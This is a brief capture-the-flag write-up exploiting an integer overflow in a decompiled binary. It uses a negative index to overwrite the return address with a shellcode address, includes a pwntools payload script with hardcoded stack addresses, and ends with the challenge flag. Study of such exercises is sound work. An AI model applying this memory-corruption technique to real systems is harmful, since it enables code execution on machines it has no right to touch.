first i took the code and decompiled it using ghidra. i can see integer overflow, that we can give it negative value and go back in the memory.

the idea behind the attack is to override where the return address is found, and put our shellcode address.

we can see that the address of the auStack_34 is located in [ebp-0x34], so if we’ll set arg1 = -1, we can override the address. than, we need to find where on the stack the return address is found, take this memory location, and this will be the new address of our auStack_34

import sys
from pwn import *


buffer_address = 0xffffd2cc
shellcode_address = 0xffffd53c

arg1 = -1 
arg2 = buffer_address
arg3 = shellcode_address


payload = str(arg1).encode() + b' ' + hex(arg2).encode() + b' ' + p32(arg3)

sys.stdout.buffer.write(payload)

.

Flag: VHOuCx7iA5